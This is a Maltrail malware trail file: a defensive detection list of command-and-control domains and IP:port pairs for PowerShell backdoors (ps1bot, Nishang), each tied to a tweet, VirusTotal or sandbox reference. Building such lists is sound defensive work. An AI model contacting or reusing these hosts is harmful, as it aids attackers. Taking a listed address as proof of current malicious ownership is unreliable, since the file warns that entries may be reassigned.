# Copyright (c) 2014-2025 Maltrail developers (https://github.com/stamparm/maltrail/)
# See the file 'LICENSE' for copying permission

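# Aliases: ps1bot
# NOTE(review): each trail below is a point-in-time observation taken from the reference above it.
# An IP:port pair or dynamic-DNS name may since have been reassigned, so check a hit against
# its reference and the surrounding traffic before treating it as a confirmed compromise.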

# Reference: https://twitter.com/ScumBots/status/1052260096422625281

ryenylittleleague.azureedge.net

# Reference: https://twitter.com/ScumBots/status/1053342340012744705

call.sysapi.net

# Reference: https://twitter.com/ScumBots/status/1053341937271476224

yi4qsyaprvlbephz.onion.to

# Reference: https://twitter.com/ScumBots/status/1059443242612203520

mypsh.ddns.net

# Reference: https://twitter.com/ScumBots/status/1060034869013700608

rekt.onthewifi.com

# Reference: https://twitter.com/ScumBots/status/1061987878987816960

leon-de-bruxelle.com

# Reference: https://twitter.com/ScumBots/status/1062368314670891008

frontieredevie.fr

# Reference: https://twitter.com/ScumBots/status/1066171943399903232

epelix-63870.portmap.io

# Reference: https://twitter.com/ScumBots/status/1069302264974721024

alphatool.serveo.net

# Reference: https://twitter.com/ScumBots/status/1069654505636139017

meterpreter.serveo.net

# Reference: https://twitter.com/ScumBots/status/1070687543543386114

it-pro.serveo.net

# Reference: https://twitter.com/ScumBots/status/1074270423804723200

globalact.gq

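# Reference: https://twitter.com/ScumBots/status/1075034205472653312
# NOTE(review): 0.tcp.ngrok.io is a shared ngrok TCP tunnel endpoint used by many unrelated tenants,
# not a per-actor host. A match on the bare hostname is low-confidence without the tunnel port
# or other corroborating context.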

0.tcp.ngrok.io

# Reference: https://twitter.com/ScumBots/status/1078973915840552960

manage-shope.com

# Reference: https://twitter.com/ScumBots/status/1079066477289005057

amazon34.duckdns.org

# Reference: https://twitter.com/ScumBots/status/1081939579693920257

rostelekom.pw

hack.localtunnel.digital-securite.ovh
digital-securite.ovh
kaliccbx.ddns.net

# Reference: https://twitter.com/ScumBots/status/1098326434274267142

195.3.146.86:443

# Reference: https://twitter.com/ScumBots/status/1100239578068328454

noticiasfinancieras.zapto.org

# Reference: https://twitter.com/ScumBots/status/1101069508419178503

46.29.163.222:9999

# Reference: https://twitter.com/ScumBots/status/1103395507546845190

leel.ddns.net

# Reference: https://twitter.com/ScumBots/status/1104348618335678464

104.145.231.114:8091

# Reference: https://twitter.com/ScumBots/status/1105065844005048321

91.211.88.131:5555

# Reference: https://twitter.com/ScumBots/status/1106460030218440709

95.179.235.70:443

# Reference: https://twitter.com/ScumBots/status/1106994800660807681

186.81.33.145:63000

# Reference: https://twitter.com/ScumBots/status/1107437718659891200

186.81.33.145:64000

# Reference: https://twitter.com/ScumBots/status/1107225070819332097

k.bank3.io

# Reference: https://twitter.com/ScumBots/status/1108808003829014530

noticiasfinancieras.zapto.org

# Reference: https://twitter.com/ScumBots/status/1110314175715311616

194.48.152.35:443

# Reference: https://twitter.com/ScumBots/status/1112449681454452736

159.89.214.31:42069

# Reference: https://twitter.com/ScumBots/status/1112450458700996608

193.161.193.99:40138

# Reference: https://twitter.com/ScumBots/status/1113317717300469760

95.213.251.165:7070

# Reference: https://twitter.com/ScumBots/status/1113955672138354688

186.81.33.145:64500

# Reference: https://twitter.com/ScumBots/status/1114833955822481408

151.80.60.117:6666

# Reference: https://twitter.com/ScumBots/status/1114849055501422593

47.95.251.134:8886

# Reference: https://twitter.com/ScumBots/status/1116428100286537728

78.192.98.226:4444

# Reference: https://twitter.com/ScumBots/status/1117790943208513537

52.15.72.79:14441

# Reference: https://twitter.com/ScumBots/status/1117793457999949824

5.19.4.164:4444

# Reference: https://twitter.com/ScumBots/status/1117808559637577730

52.15.72.79:10241

# Reference: https://twitter.com/ScumBots/status/1118058956298051584

185.242.21.78:80

# Reference: https://twitter.com/ScumBots/status/1118261545220345856

159.89.214.31:4343

# Reference: https://twitter.com/ScumBots/status/1119448112613986305

193.161.193.99:39125

# Reference: https://twitter.com/ScumBots/status/1119987918247006209

18.216.53.253:11712

# Reference: https://twitter.com/ScumBots/status/1120279841763483649

52.14.61.47:17369

# Reference: https://twitter.com/ScumBots/status/1121470183523201026

52.14.61.47:19552

# Reference: https://twitter.com/ScumBots/status/1121854255898472453

87.223.180.106:4444

# Reference: https://twitter.com/ScumBots/status/1121891714321518593

170.70.41.120:8080

# Reference: https://twitter.com/pmelson/status/1123226187348705281

193.161.193.99:34346

# Reference: https://twitter.com/ScumBots/status/1123531266593312774

185.202.174.118:80

# Reference: https://twitter.com/ScumBots/status/1124651146621194241

88.99.59.176:666

# Reference: https://twitter.com/ScumBots/status/1125841489181978625

3.92.243.227:4444

# Reference: https://twitter.com/ScumBots/status/1126122085405921280

194.5.250.129:443

# Reference: https://twitter.com/ScumBots/status/1126466859258327042

check.wittmann-it-security.org

# Reference: https://twitter.com/ScumBots/status/1131387542715150336

18.223.41.243:12432

# Reference: https://twitter.com/ScumBots/status/1132894210573643777

134.209.84.8:8082

# Reference: https://twitter.com/ScumBots/status/1133583150750343168

109.150.206.190:443

# Reference: https://twitter.com/ScumBots/status/1135807664200527873

193.161.193.99:54015

# Reference: https://twitter.com/ScumBots/status/1141761391621283846

46.177.202.34:5151

# Reference: https://twitter.com/ScumBots/status/1141794546570997760

91.200.103.24:443

# Reference: https://twitter.com/ItsReallyNick/status/1014522001900306433
# Reference: https://www.virustotal.com/gui/file/457282edec9eb312d6d99644c4a7c097b4c8984a023e255a5942b5dab5635a56/detection

52.17.157.98:445

# Reference: https://twitter.com/pmelson/status/1143536066781204481

aaa.stage.13171101.lol.intepi.net

# Reference: https://twitter.com/pmelson/status/1143527997888180234

179.43.160.219:80

# Reference: https://twitter.com/ScumBots/status/1143807370969210883

3.14.212.173:18032

# Reference: https://twitter.com/ScumBots/status/1143959624430829570

54.36.163.79:80

# Reference: https://twitter.com/ScumBots/status/1145504975939866624

116.206.228.203:7834

# Reference: https://twitter.com/ScumBots/status/1148985146550493188

190.166.86.4:4444

# Reference: https://twitter.com/ScumBots/status/1149750278842912768

194.99.22.146:443

# Reference: https://twitter.com/ScumBots/status/1150554457668751360

146.255.150.56:4444

# Reference: https://twitter.com/ScumBots/status/1151144078215700480

103.242.237.110:4446

# Reference: https://twitter.com/ScumBots/status/1151148452652421121

kurosan.ddns.net

# Reference: https://twitter.com/ScumBots/status/1151145809108512769

78.193.216.186:4446

# Reference: https://twitter.com/ScumBots/status/1151906993810083842

52.14.249.189:8080

# Reference: https://twitter.com/ScumBots/status/1156103391753506821

3.14.212.173:12313

# Reference: https://twitter.com/ScumBots/status/1156359755281195008

3.17.202.129:12313

# Reference: https://twitter.com/ScumBots/status/1156840752342818818

185.207.205.12:28741

# Reference: https://twitter.com/ScumBots/status/1157218238041866240

185.207.205.12:28742

# Reference: https://twitter.com/ScumBots/status/1159527654225301506

149.6.167.58:443

# Reference: https://twitter.com/ScumBots/status/1160356057207713792

95.144.8.33:4444

# Reference: https://twitter.com/ScumBots/status/1160550196004237312

3.19.3.150:12081

# Reference: https://twitter.com/ScumBots/status/1160550327273295872

3.14.212.173:12081

# Reference: https://twitter.com/ScumBots/status/1160537610718253056

18.223.41.243:19419

# Reference: https://twitter.com/ScumBots/status/1161082450140958720

194.5.250.105:443

# Reference: https://twitter.com/ScumBots/status/1161967029018071046

attem83.duckdns.org

# Reference: https://twitter.com/ScumBots/status/1162058130307584002

153.73.72.79:4444

# Reference: https://twitter.com/ScumBots/status/1165093924517625856

185.244.150.240:443

# Reference: https://twitter.com/ScumBots/status/1165422297328619521

18.223.41.243:12313

# Reference: https://twitter.com/ScumBots/status/1165808947657420800

18.223.41.243:15578

# Reference: https://twitter.com/ScumBots/status/1166415604384972800

18.223.41.243:14529

# Reference: https://twitter.com/ScumBots/status/1167576493758791681

45.45.76.113:1337

# Reference: https://twitter.com/ScumBots/status/1170326258372218880

82.102.24.42:4444

# Reference: https://twitter.com/ScumBots/status/1170357503370170368

104.154.246.115:443

# Reference: https://twitter.com/ScumBots/status/1171978786507808768

amazon34.duckdns.org

# Reference: https://twitter.com/i/status/1172612874708996096
# Reference: https://app.any.run/tasks/a2ddc0ed-5c0f-409e-bf26-457a9237ce3d/

159.246.29.114:443

# Reference: https://twitter.com/ScumBots/status/1173444749287710720

onezero0.net

# Reference: https://twitter.com/ScumBots/status/1176404662653730817

141.255.159.11:4444

# Reference: https://twitter.com/ScumBots/status/1178475870652116994

185.61.148.70:443

# Reference: https://twitter.com/VK_Intel/status/1179450328900685831

91.214.124.20:80

# Reference: https://twitter.com/ScumBots/status/1180077281714348033

45.62.225.56:443

# Reference: https://twitter.com/ScumBots/status/1180114767970803712

3.92.243.227:4444

# Reference: https://twitter.com/ScumBots/status/1180121450092617728

27.164.5.106:16728

# Reference: https://twitter.com/ScumBots/status/1180887202265489409

185.92.74.29:4444

# Reference: https://twitter.com/ScumBots/status/1180977806920036353

185.92.74.29:35555

# Reference: https://twitter.com/ScumBots/status/1181239022875824131

3.17.202.129:13147

# Reference: https://twitter.com/ScumBots/status/1181435313270525953

psycho.ooguy.com

# Reference: https://twitter.com/ScumBots/status/1183274933348192258

tronium.ddns.net

# Reference: https://twitter.com/ScumBots/status/1183654188192014337

3.19.3.150:19416

# Reference: https://twitter.com/pmelson/status/1184143380294619137

137.218.255.213:22849

# Reference: https://twitter.com/ScumBots/status/1186090265611767808

193.161.193.99:49202

# Reference: https://twitter.com/ScumBots/status/1186624502945517569

3.92.243.227:4444

# Reference: https://twitter.com/ScumBots/status/1188695655608455173

76.218.94.80:4444

# Reference: https://twitter.com/ScumBots/status/1190274811139969024

18.223.41.243:17192

# Reference: https://twitter.com/ScumBots/status/1190807095806963713

18.223.41.243:19650

# Reference: https://twitter.com/DidierStevens/status/1192870847217840131

3.134.31.210:8080

# Reference: https://twitter.com/ScumBots/status/1193726301967917057

18.188.14.65:14404

# Reference: https://twitter.com/ScumBots/status/1195001191253643270

5.175.214.20:18880

# Reference: https://twitter.com/ScumBots/status/1195118477520121856

5.94.121.244:4444

# Reference: https://twitter.com/ScumBots/status/1195564311982354433

192.241.132.33:4433

# Reference: https://twitter.com/ScumBots/status/1195729497934508035

186.10.116.109:4455

# Reference: https://twitter.com/ScumBots/status/1196883776405725191

df98fdslkjfs.red

# Reference: https://twitter.com/ScumBots/status/1197508727001305089

85.152.6.30:8080

# Reference: https://twitter.com/ScumBots/status/1200520713536491520

185.174.172.201:443

# Reference: https://twitter.com/ScumBots/status/1200716613202391040

193.161.193.99:56282

# Reference: https://twitter.com/ScumBots/status/1200720388281569280

192.241.133.27:4466

# Reference: https://twitter.com/ScumBots/status/1201587934127886338

telastex.net

# Reference: https://twitter.com/ScumBots/status/1201978181139550210

24.52.217.77:5443

# Reference: https://twitter.com/ScumBots/status/1203528860098281472

updateqdb.com

# Reference: https://twitter.com/ScumBots/status/1204219193698267146

134.209.84.8:8082

# Reference: https://twitter.com/ScumBots/status/1204414044804800517

92.84.116.3:1911

# Reference: https://twitter.com/ScumBots/status/1206925775464796163

18.188.14.65:12260

# Reference: https://twitter.com/ScumBots/status/1210387460083073025

217.80.20.213:1515

# Reference: https://www.virustotal.com/gui/file/cfc2bd30cdeacd9c3a91259f0013778d4e5436871e929f10c1cd8d7b14b041a7/detection

18.223.41.243:18113
3.17.202.129:18113
3.19.3.150:18113

# Reference: https://www.virustotal.com/gui/file/0320d90a95fbb080763f71deb3148f32bf78abf8f10286dcf118c0e36a936292/detection

3.14.212.173:4040
3.17.202.129:16416

# Reference: https://www.virustotal.com/gui/file/b537f1d14d0524c436532ea2be7d0fe51ce543886b477a8517480fc68dc57a6b/detection

3.17.202.129:13841

# Reference: https://www.virustotal.com/gui/file/95f1ea0b38a61e7778ef017e091206f99f13ded7ddf2fc36a20de8da70055e12/detection

3.17.202.129:12010

# Reference: https://www.virustotal.com/gui/file/70bba627efb3ff53f0175adc91f8475fbaf2a7cad3d6a804b80d75abe7381b74/detection

3.14.212.173:15905

# Reference: https://www.virustotal.com/gui/file/3e4e78dd9cbddd1800d0891ef95f6f5bda212bcbb1a069f2fbaaba3668ac85f7/detection

3.14.212.173:12734

# Reference: https://www.virustotal.com/gui/file/a3ed5434cd0962e13e85377f3e2737b027d75f46445ce2410dc5538164242be9/detection

3.17.202.129:17299
3.19.114.185:17299

# Reference: https://www.virustotal.com/gui/file/695b9ca3cd336e0372732e0d5227ca0e58da1dfc3298615e9c0ace25cb1baf3d/detection

18.188.14.65:15344
3.17.202.129:15344

# Reference: https://www.virustotal.com/gui/file/27b0e998a7920147e7d58753f1d8d96dbbaec541076e5361a04324a9753081f2/detection

3.14.212.173:17035
3.17.202.129:17035

# Reference: https://www.virustotal.com/gui/file/14fe05562eeefb83448360308522709a31db34955de01bca438965af343c66a6/detection

18.223.41.243:11265

# Reference: https://www.virustotal.com/gui/file/5638ed9a9d4ea35e861d344441a2e5b1e4cdcfc358c8c7dd077574dd49657a3d/detection

96ac532a.ngrok.io

# Reference: https://www.virustotal.com/gui/file/cd8b19cbe08a2ace933b9f3e631d4752c1f8f56e04646c03510877cda5c87e3d/detection

193.161.193.99:49202

# Reference: https://www.virustotal.com/gui/file/13843c62906ce22307c6861b25b5e8672aa1766f4e41cb425a0c9468a6823085/detection

193.161.193.99:63420

# Reference: https://www.virustotal.com/gui/file/25cd26e740426b51a966a2c1c4888496c27bba7abf12589fae98394f3550e027/detection

3.19.3.150:15492

# Reference: https://www.virustotal.com/gui/file/cfc2bd30cdeacd9c3a91259f0013778d4e5436871e929f10c1cd8d7b14b041a7/detection

18.223.41.243:18113
3.17.202.129:18113
3.19.3.150:18113

# Reference: https://www.virustotal.com/gui/file/66bc47048c508f0bde60a88deb339e914b6f3c60bb1b2256e83d118bf3dad928/detection

3.19.3.150:80

# Reference: https://www.virustotal.com/gui/file/4c63034454f490a8ed01a7685e1606d32da5e7f301d3538bccf4f7de5e41bd66/detection

3.19.3.150:19416

# Reference: https://www.virustotal.com/gui/file/2bb71dbfb2ccf9eddb7143437a2b430181d472fce6b819426b8c4e3ce1f5bf82/detection

3.19.3.150:11036

# Reference: https://www.virustotal.com/gui/file/c7157233ddc1df83112d6eb3466180b3347f1069d8b878d424747508ccd9d949/detection

3.19.114.185:15344
3.19.3.150:15344

# Reference: https://www.virustotal.com/gui/file/8835a022439a0b630a2c2eba40b9bcf0432cb8d68d7a0060a1a44246cec29ab2/detection

3.19.3.150:11317

# Reference: https://www.virustotal.com/gui/file/7d60fd1bbf98b86ead194f76bf4413f9a70b91567037c015156a5c70d7c7a5eb/detection

3.19.3.150:29038

# Reference: https://www.virustotal.com/gui/file/bc4689aab804e44f23cf60bb9bc4c17bd68b73224f7267d1a0d41c3d55af4458/detection

185.101.92.3:1777

# Reference: https://www.virustotal.com/gui/file/218d24468418a0b6fd800a464ba64aeea42add82a11c284ee094076555c3d237/detection

trszrfea.ddns.net

# Reference: https://www.virustotal.com/gui/file/73562ccfd6dc94c59dcd691aceccdf1eeee089ff69a041234f3bf65dc218bbab/detection

185.101.92.3:8636

# Reference: https://twitter.com/c3rb3ru5d3d53c/status/1213831684791123969

23.227.207.185:444

# Reference: https://twitter.com/ScumBots/status/1215378978212646927

107.191.46.239:14293

# Reference: https://twitter.com/ScumBots/status/1217633122059259905

newsrecordmusic112.monster

# Reference: https://twitter.com/ScumBots/status/1217920265478459395

194.99.22.145:443

# Reference: https://twitter.com/ScumBots/status/1217922012481556480

45.153.186.51:443

# Reference: https://twitter.com/ScumBots/status/1217872955310530560

185.244.150.5:4444

# Reference: https://twitter.com/ScumBots/status/1218660424876462082

137.224.106.4:73

# Reference: https://twitter.com/ScumBots/status/1218849343442210816

3.17.202.129:11591

# Reference: https://www.virustotal.com/gui/file/c15ecbb84c15839556f39589f7f513dc3785b5ac727ba26f2d29b9993661696f/detection

185.27.134.11:24004

# Reference: https://twitter.com/ScumBots/status/1219796839031103494

165.227.61.185:443

# Reference: https://twitter.com/ScumBots/status/1219988825130356736
# Reference: https://www.virustotal.com/gui/domain/officestorage.org/relations

185.245.84.106:443
officestorage.org

# Reference: https://twitter.com/ScumBots/status/1219998021926182924

185.165.168.226:443
virtualofficeroom.com

# Reference: https://twitter.com/ScumBots/status/1220180618132316160

fearlesslyhuman.org

# Reference: https://twitter.com/ScumBots/status/1190345274872532993

c2.virus.eu

# Reference: https://twitter.com/ScumBots/status/1183048566929002496

3.8.236.109:443

# Reference: https://twitter.com/ScumBots/status/1218566229264343041

autodiscover.cisco-gateway.com

# Reference: https://www.virustotal.com/gui/file/09f1ee55ee6d228e8bca7120191ef4160294a2b45743ba2b52449f4bd6fd730f/detection (# Nishang)

3.17.202.129:16437

# Reference: https://twitter.com/ScumBots/status/1220945633625935872 (# Nishang)

3.17.202.129:11353

# Reference: https://twitter.com/ScumBots/status/1220945728811552773 (# Nishang)

3.17.202.129:17008

# Reference: https://twitter.com/ScumBots/status/1220946013600518144 (# Nishang)

3.17.202.129:17413

# Reference: https://twitter.com/ScumBots/status/1220945586955964418 (# Nishang)

3.17.202.129:19355

# Reference: https://twitter.com/ScumBots/status/1220945824517173248 (# Nishang)

3.17.202.129:14901

# Reference: https://twitter.com/ScumBots/status/1220945776081326085 (# Nishang)

3.17.202.129:12022

# Reference: https://twitter.com/ScumBots/status/1220945964506107904 (# Nishang)

3.17.202.129:16264

# Reference: https://twitter.com/ScumBots/status/1220945917223874561 (# Nishang)

3.17.202.129:18777

# Reference: https://twitter.com/ScumBots/status/1220945680551895040 (# Nishang)

3.17.202.129:16437

# Reference: https://twitter.com/ScumBots/status/1220945870386012160 (# Nishang)

3.17.202.129:10146

# Reference: https://twitter.com/ScumBots/status/1221394913562124289 (# Nishang)

3.17.202.129:18163

# Reference: https://twitter.com/ScumBots/status/1221410012804911105 (# Nishang)

3.17.202.129:12205

# Reference: https://twitter.com/ScumBots/status/1221437692157865984 (# Nishang)

3.17.202.129:11916

# Reference: https://twitter.com/ScumBots/status/1221445243301715970 (# Nishang)

3.17.202.129:15404

# Reference: https://twitter.com/ScumBots/status/1221467894363705344 (# Nishang)

3.17.202.129:15173

# Reference: https://twitter.com/ScumBots/status/1222242996755845120 (# Nishang)

3.17.202.129:19733

# Reference: https://twitter.com/ScumBots/status/1222265648564273153 (# Nishang)

3.17.202.129:10418

# Reference: https://twitter.com/ScumBots/status/1222532412279808000 (# Nishang)

3.17.202.129:10740

# Reference: https://twitter.com/ScumBots/status/1222597835474030592 (# Nishang)

3.17.202.129:17202

# Reference: https://twitter.com/ScumBots/status/1222814262403399680 (# Nishang)

3.17.202.129:11400

# Reference: https://twitter.com/ScumBots/status/1223586875371401217 (# Nishang)

3.17.202.129:14379

# Reference: https://twitter.com/ScumBots/status/1223654823356256256 (# Nishang)

3.17.202.129:15404

# Reference: https://twitter.com/ScumBots/status/1223994559912464386 (# Nishang)

3.17.202.129:14766

# Reference: https://twitter.com/ScumBots/status/1223994628220866560 (# Nishang)

3.17.202.129:15676

# Reference: https://twitter.com/ScumBots/status/1222207486062735363

82.31.142.196:80
whipped.duckdns.org

# Reference: https://twitter.com/ScumBots/status/1222451876064526337

45.32.72.237:443

# Reference: https://twitter.com/ScumBots/status/1222517422483288065

bankingadvice.net

# Reference: https://twitter.com/ScumBots/status/1222576942748250114

27.4.98.173:443

# Reference: https://www.virustotal.com/gui/file/f5f0d36874f9e69329601f2334b6d4f218bafe857b3cbb5f9e8ad13d328f0d51/detection

weirdly.crabdance.com

# Reference: https://www.virustotal.com/gui/file/611e4ecdf7e7db5e2308f3af69d01a4a28866aa3b434d77f7a2b7a95a8faf292/detection

194.5.98.139:444

# Reference: https://www.virustotal.com/gui/file/bb11f097959ea9c8854e064fb63008f0fd3916f13ad9437762b133663613b56d/detection

178.124.140.147:444

# Reference: https://twitter.com/ScumBots/status/1223577316024115200

51.159.56.13:32042

# Reference: https://www.virustotal.com/gui/file/f5f0d36874f9e69329601f2334b6d4f218bafe857b3cbb5f9e8ad13d328f0d51/detection

185.148.241.50:444

# Reference: https://twitter.com/ScumBots/status/1225790150564859905

18.223.41.243:14272

# Reference: https://twitter.com/ScumBots/status/1225807757019840512

18.223.41.243:14272

# Reference: https://twitter.com/pmelson/status/1226248009786236928

58.96.92.95:38900

# Reference: https://twitter.com/ScumBots/status/1226278360436924416

renovatesystem.com

# Reference: https://www.virustotal.com/gui/file/cb4778c05f0c2635000bd05e42070994568e9e4d992e32536c406217fb5b063e/detection

185.101.92.3:1204
danger11.duckdns.org

# Reference: https://www.virustotal.com/gui/file/143aea5d387c714790accdfa13a9cd0f6eef6b7b957b5c3b2f3a9e4e3e03c4b5/detection

27.63.179.85:1202

# Reference: https://www.virustotal.com/gui/file/3b436a5c83b85b2734a34367a488d7ea59b086708b5c2c2582265607fab36adf/detection

185.101.92.3:1209
27.63.162.41:1209

# Reference: https://twitter.com/ScumBots/status/1226967904626913281

46.119.226.171:4444

# Reference: https://twitter.com/ScumBots/status/1226906959946899457

94.156.189.250:443

# Reference: https://twitter.com/ScumBots/status/1228827730038398977

185.147.15.22:443

# Reference: https://twitter.com/ScumBots/status/1229078059871096832
# Reference: https://www.virustotal.com/gui/file/a1c29c076b654c070bad23d0d49018e7e6b54bf4cc942da9b59aec6c7f086d26/detection

139.59.145.48:80

# Reference: https://twitter.com/ScumBots/status/1229751243075092487

137.224.106.4:73

# Reference: https://twitter.com/ScumBots/status/1229647311187386368

3.17.148.164:4444

# Reference: https://twitter.com/ScumBots/status/1231132845567025152

41.242.125.159:9326

# Reference: https://twitter.com/ScumBots/status/1231146688389242881

46.19.138.139:8080

# Reference: https://www.virustotal.com/gui/ip-address/45.66.250.11/relations

45.66.250.11:443
45.66.250.11:80

# Reference: https://twitter.com/ScumBots/status/1232300541243535364
# Reference: https://www.virustotal.com/gui/ip-address/209.97.190.80/relations

209.97.190.80:80

# Reference: https://twitter.com/ScumBots/status/1232427628751179778

2.58.47.203:51022

# Reference: https://twitter.com/ScumBots/status/1232842863211315202

empire.hillsclerk.us

# Reference: https://twitter.com/ScumBots/status/1232864255902470145

203.132.95.52:4444

# Reference: https://twitter.com/ScumBots/status/1233415444608036870

45.77.65.211:443

# Reference: https://app.any.run/tasks/e84e3cdc-9ba0-4756-ab1d-fcd49627310a/

3.19.3.150:19011
3.19.3.185:19011

# Reference: https://app.any.run/tasks/41e07e9b-b2c7-4a68-a753-bac8af8b5129/

18.223.41.243:19011

# Reference: https://app.any.run/tasks/7f128fa7-fb0d-4dee-9030-838756962045/

3.17.202.129:16276

# Reference: https://app.any.run/tasks/a24f9f91-7f49-4c39-9fd7-a201823e0dd3/

18.223.41.243:17037

# Reference: https://app.any.run/tasks/be1bef6c-d7e1-48bd-8615-36ae937e5149/

51.79.13.195:443

# Reference: https://app.any.run/tasks/d28a0271-4c99-41db-b465-6b8f491be0f7/

18.188.14.65:17085

# Reference: https://app.any.run/tasks/b2e3dce5-0431-49b8-bfa9-755ede26669f/

3.17.202.129:17085

# Reference: https://app.any.run/tasks/45c2192e-d4aa-4c9f-8023-df08ce3fe263/

18.223.41.243:17085

# Reference: https://app.any.run/tasks/caee7291-f505-434f-9776-f3823f800924/

3.19.3.150:19926

# Reference: https://app.any.run/tasks/614143b4-f937-4440-a6fa-75104cbe3749/

3.19.3.150:17085

# Reference: https://app.any.run/tasks/371b7c11-6ca7-4b47-9c7f-3fb2a2925778/

18.223.41.243:19926

# Reference: https://app.any.run/tasks/b78b0de3-6fec-48ed-8fec-2b89eded1ccf/

18.223.41.243:12297

# Reference: https://app.any.run/tasks/4d8c492a-5e93-44a2-ae25-de5b0c42995a/

3.19.114.185:19926

# Reference: https://app.any.run/tasks/3fc8bb68-e8c2-4fa7-933b-f4d2f3311f86/

3.19.114.185:12297

# Reference: https://app.any.run/tasks/ff1c77ac-741d-4fe3-88f2-078703b8b554/

3.19.3.150:13705

# Reference: https://app.any.run/tasks/2b671d09-a141-4182-89fc-8b22f82ce17c/

18.188.14.65:18003

# Reference: https://app.any.run/tasks/919c78ff-42e7-4a31-bf86-e049acd51087/

3.17.202.129:18460

# Reference: https://app.any.run/tasks/20629c84-f053-43b8-92f6-a5ac72e0ec0e/

3.19.3.150:14975

# Reference: https://app.any.run/tasks/8042e101-7155-420d-9341-d3465ca67200/

5.199.167.188:443

# Reference: https://app.any.run/tasks/02bec560-ffa8-4dd1-a454-0ed53a8e5477/

18.223.41.243:17697

# Reference: https://app.any.run/tasks/d32fdbff-318b-47f7-a4fb-b6a0ea43dd31/

45.147.230.255:443

# Reference: https://app.any.run/tasks/27766850-f078-4c83-b3b9-efb0555102a5/

95.179.223.7:443

# Reference: https://app.any.run/tasks/1f8f95bd-c468-44df-a85d-a12db4b6bec5/

23.227.207.185:444

# Reference: https://app.any.run/tasks/4bcf6d77-73c1-474b-880d-8336b4e2b684/

5.252.176.28:443

# Reference: https://app.any.run/tasks/47215b69-0652-4d00-a3b7-b0105d8bc6f8/

154.194.3.229:443

# Reference: https://app.any.run/tasks/56966ffa-ce51-43ee-b0f3-ea4d7255700b/

106.13.161.43:8008

# Reference: https://app.any.run/tasks/dbabc592-e5ba-4aac-baa2-cab401522d58/

108.62.141.34:443

# Reference: https://app.any.run/tasks/41364a08-e861-4c8b-8667-191853c31580/

91.214.124.64:443

# Reference: https://app.any.run/tasks/ee44f6c0-2aeb-4850-ae2f-3ffdba532096/

79.137.36.9:4444

# Reference: https://app.any.run/tasks/40c32568-72c6-49fe-b168-a9dbe611d15a/

37.48.83.137:443

# Reference: https://app.any.run/tasks/41511d60-4804-4d84-83d8-b17b58e8d119/

47.95.210.165:8088

# Reference: https://twitter.com/ScumBots/status/1235898016126636032

amazn.cloud

# Reference: https://twitter.com/ScumBots/status/1237294702384291840
# Reference: https://www.virustotal.com/gui/file/2fce54f19cc11e9bea9a18952cae872d43d22bfba1e3bbb393ed9a94cd41ac0e/detection

manulife.ca-syschk.net

# Reference: https://twitter.com/James_inthe_box/status/1237491709824516096
# Reference: https://twitter.com/ScumBots/status/1237494768000614400

107.4.90.214:666

# Reference: https://twitter.com/ScumBots/status/1237851828500365317
# Reference: https://www.virustotal.com/gui/file/6c97dbef34d64b48f0f774e458bbc25f38b902b3c2f3e819e3b276c781511603/detection

newsrecordmusic112.monster

# Reference: https://twitter.com/ScumBots/status/1237898455797792769

185.92.74.29:35555

# Reference: https://twitter.com/ScumBots/status/1237898529734967298

185.211.245.139:8744

# Reference: https://twitter.com/ScumBots/status/1237898605979025409

ahost.rythmstick.net

# Reference: https://twitter.com/ScumBots/status/1238045901559607296

3.120.130.166:4444

# Reference: https://twitter.com/ScumBots/status/1238198152789966850

217.182.54.208:5490

# Reference: https://twitter.com/ScumBots/status/1238427161482211328

77.72.131.69:443

# Reference: https://twitter.com/malwrhunterteam/status/1238433863862550535

34.217.82.194:4444

# Reference: https://twitter.com/ScumBots/status/1238564315239768065

68.202.129.2:444

# Reference: https://twitter.com/ScumBots/status/1238761868623306752
# Reference: https://twitter.com/StopMalvertisin/status/1631629929845764097
# Reference: https://www.virustotal.com/gui/file/a21154a8f1e40e4c15a68c15c1fd3d0b2f2d227c55d328c05425c19f97a825cc/detection

3.90.140.45:8080
35.170.96.22:8080
54.80.171.208:8080
emp.fourhorsemen.tech

# Reference: https://twitter.com/ScumBots/status/1238764388259168257

bankingadvice.net

# Reference: https://www.virustotal.com/gui/file/daab59d033ea03ebeb8a80666895c703f84be5e55d0652d28018c38419b0b1b7/detection

79.134.225.87:7519

# Reference: https://twitter.com/ScumBots/status/1239777308426350592

LostSec.duckdns.org

# Reference: https://twitter.com/ScumBots/status/1239831415941988352
# Reference: https://www.virustotal.com/gui/ip-address/83.171.237.192/relations

83.171.237.192:443

# Reference: https://twitter.com/ScumBots/status/1239828901699948544

185.189.183.47:443

# Reference: https://twitter.com/ScumBots/status/1241030568860672000

78.98.10.243:6969

# Reference: https://twitter.com/ScumBots/status/1241330107983237120

193.161.193.99:48650

# Reference: https://www.virustotal.com/gui/file/0102a1e5c866802c447fd541a064deb0649989766797fce6c66710661644a2ae/detection

3.135.90.78:19505

# Reference: https://twitter.com/ScumBots/status/1242039722723196928

185.244.30.75:5544

# Reference: https://twitter.com/ScumBots/status/1242403412077096961

youtube-au.com

# Reference: https://twitter.com/ScumBots/status/1242561911541182464

45.147.229.143:1499

# Reference: https://twitter.com/ScumBots/status/1243837813843537920

3.90.140.45:8080
emp.fourhorsemen.tech

# Reference: https://twitter.com/ScumBots/status/1243842847016615936

3.133.136.228:8080

# Reference: https://twitter.com/ScumBots/status/1243835299656056832

195.2.92.129:8080

# Reference: https://twitter.com/ScumBots/status/1243832784256487424

119.28.226.59:8080

# Reference: https://twitter.com/ScumBots/status/1244671656490078211

193.161.193.99:25820

# Reference: https://twitter.com/ScumBots/status/1244679610975105033

193.161.193.99:59646

# Reference: https://twitter.com/ScumBots/status/1244677096301105153

193.161.193.99:5555

# Reference: https://twitter.com/ScumBots/status/1244671587292532738
# Reference: https://www.virustotal.com/gui/file/871931280a302e93984da3c771823100ac5bba0d8f57b0fb9311966f58563de3/detection

139.162.161.211:11320
139.162.161.211:12130

# Reference: https://twitter.com/notajungman/status/1245737937419079680
# Reference: https://app.any.run/tasks/92024127-dfc1-43eb-8f67-f06cd80c473a/

us.palodevops.com

# Reference: https://www.virustotal.com/gui/file/03dd215f9bea6267537736d045f61cd1168e18a1e713550a5d4b847a8dbd563d/detection

171.5.183.76:2516
171.5.188.210:2516
flukez.ddns.net

# Reference: https://twitter.com/ScumBots/status/1250583513147064321

pastebin-sucks-now.biz

# Reference: https://twitter.com/ScumBots/status/1251780150959788032

134bd4b7.ngrok.io

# Reference: https://www.virustotal.com/gui/file/7829b5e1783d04dbbf18d2f482ca5a231c706b06183d53138c8561b0f60d1101/detection

141.255.154.68:4444

